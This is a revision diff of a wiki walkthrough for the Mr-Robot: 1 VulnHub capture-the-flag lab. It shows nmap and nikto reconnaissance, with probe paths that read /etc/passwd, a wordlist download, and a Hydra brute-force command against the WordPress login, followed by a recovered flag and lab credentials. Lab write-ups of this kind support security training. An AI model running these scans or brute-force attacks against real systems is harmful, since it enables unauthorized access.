Difference between revisions of "Mr-Robot: 1 ~ VulnHub - Walkthrough"

m (Discovery)
m (Discovery)
Line 28: Line 28:
 
...
 
...
 
</syntaxhighlight>
 
</syntaxhighlight>
Let's take a look that port 80
 
<syntaxhighlight  lang=shell-session highlight="14,30" line>
 
root@kali:/mnt/VM_Transfer/Pentesting/Mr. Robot# nikto -h 192.168.56.107
 
- Nikto v2.1.6
 
---------------------------------------------------------------------------
 
+ Target IP:          192.168.56.107
 
+ Target Hostname:    192.168.56.107
 
+ Target Port:        80
 
+ Start Time:        2018-05-13 15:46:30 (GMT-4)
 
---------------------------------------------------------------------------
 
+ Server: Apache
 
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 
+ Retrieved x-powered-by header: PHP/5.5.29
 
+ No CGI Directories found (use '-C all' to force check all possible dirs)
 
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
 
+ Uncommon header 'tcn' found, with contents: list
 
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
 
+ OSVDB-3092: /admin/: This might be interesting...
 
+ OSVDB-3092: /readme: This might be interesting...
 
+ Uncommon header 'link' found, with contents: <http://192.168.56.107/?p=23>; rel=shortlink
 
+ OSVDB-5089: /admin/system.php3?cmd=cat%20/etc/passwd: DotBr 0.1 allows remote command execution.
 
+ OSVDB-5090: /admin/exec.php3?cmd=cat%20/etc/passwd: DotBr 0.1 allows remote command execution.
 
+ /wp-links-opml.php: This WordPress script reveals the installed version.
 
+ OSVDB-3092: /license.txt: License file found may identify site software.
 
+ /admin/index.html: Admin login page/section found.
 
+ Cookie wordpress_test_cookie created without the httponly flag
 
+ /wp-login/: Admin login page/section found.
 
+ /wordpress/: A Wordpress installation was found.
 
+ /wp-admin/wp-login.php: Wordpress login found
 
+ /blog/wp-login.php: Wordpress login found
 
+ /wp-login.php: Wordpress login found
 
+ 7536 requests: 1 error(s) and 20 item(s) reported on remote host
 
+ End Time:          2018-05-13 15:50:06 (GMT-4) (216 seconds)
 
---------------------------------------------------------------------------
 
+ 1 host(s) tested
 
</syntaxhighlight>
 
Two things pop up - a possible WP installation and robots. txt.
 
 
Manually trying default some standard credentials at '/wp-login.php' didn't bring any success so let's take a look around
 
 
<syntaxhighlight  lang=shell-session highlight="3,4" line>
 
root@kali:~# curl http://192.168.56.108/robots.txt
 
User-agent: *
 
fsocity.dic
 
key-1-of-3.txt
 
</syntaxhighlight>
 
'''Key 1: 073403c8a58a1f80d943455fb30724b9'''
 
 
Now, what else do we have here? list of users? passwords?
 
<syntaxhighlight  lang="shell-session" highlight="" line>
 
root@kali:~# wget http://192.168.56.108/fsocity.dic
 
--2018-05-13 15:53:47--  http://192.168.56.108/fsocity.dic
 
Connecting to 192.168.56.107:80... connected.
 
HTTP request sent, awaiting response... 200 OK
 
Length: 7245381 (6.9M) [text/x-c]
 
Saving to: ‘fsocity.dic’
 
....
 
root@kali:/mnt/VM_Transfer/Pentesting/Mr. Robot# wc -l fsocity.dic
 
858160 fsocity.dic
 
root@kali:~# sort -u fsocity.dic > fsocity.dic.sorted
 
root@kali:~# wc -l fsocity.dic.sorted
 
11451 fsocity.dic.sorted
 
root@kali:~# head -15 fsocity.dic
 
true
 
false
 
wikia
 
from
 
the
 
now
 
Wikia
 
extensions
 
scss
 
window
 
http
 
var
 
page
 
Robot
 
Elliot
 
</syntaxhighlight>
 
 
Alright! We have good stuff! Let's now put it to use. First let's check if any of those can be used to log in  to the WordPress admin console.
 
 
I'm going to utilize ''Hydra'' which is a threaded login cracker, to check these these against our target.
 
 
First we need the query string passed to the server after "Submit" is pressed on the log in form. Loade /wp-admin in the browser, fired up my ZAP in ''intercept'' mode, provided junk credentials ''asdf'', ''zxcv'', hit ''Submit''. According to what was intercepted by ''ZAP'', our query string looks like this:
 
 
<syntaxhighlight  lang=shell-session highlight="" line>
 
/wp-login.php?log=asdf&pwd=zxcv&wp-submit=Log In&testcookie=1
 
</syntaxhighlight>
 
 
Now use ''Hydra'' to iterate through the fsocity.dic.sorted building username/pass combinations, passing it to the query string above.
 
 
<syntaxhighlight  lang=shell-session highlight="" line>
 
root@kali:~# hydra -u -L fsocity.dic.sorted -P fsocity.dic.sorted 192.168.56.103 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=incorrect'
 
</syntaxhighlight>
 
 
Note the ''S=incorrect'' - this is where we tell ''Hydra'' to continue because the username/password combination was incorrect - the target returned ''incorrect'' as part of the response.
 
 
Depending on the size of the dictionary, this may take from a few minutes to a couple of hours. You also have an option to pause the scan and pick up where you left off later.
 
 
After about 35 mins I got a set of valid creds. The Login part turned out to be an obvious choice and if I tried that one manually before kicking off ''Hydra'' I would've saved myself quite some time (if either username or pass is known you can pass it to hydra via -l or -p respectively)
 
 
'''login: elliot  password: ER28-0652'''
 
 
<to be continued>
 
  
 
=== Entry Point #1 - Port 80 (HTTP) ===
 
=== Entry Point #1 - Port 80 (HTTP) ===

Revision as of 09:24, 15 May 2018

Objective

Find three hidden flags. Acquire 'root' access

Source: [VulnHub.com]

Status: [Work in progress]

Methodology

Discovery

root@kali:~# nmap -O -sT -sV -p- -T5 192.168.56.108

Starting Nmap 7.60 ( https://nmap.org ) at 2018-05-14 22:45 EDT
Nmap scan report for 192.168.56.108
Host is up (0.0011s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 08:00:27:B4:E3:34 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
...

Entry Point #1 - Port 80 (HTTP)

Recommendations

Appendix A: Vulnerability Detail and Mitigation

Unpatched Software Components
Rating High
Description xxxxxx
Impact xxxxx
Remediation xxxxx


Password Storage
Rating High
Description xxxxxx
Impact xxxxx
Remediation xxxxx
Retrieved from "https://blaksec.com/index.php?title=Mr-Robot:_1_~_VulnHub_-_Walkthrough&oldid=282"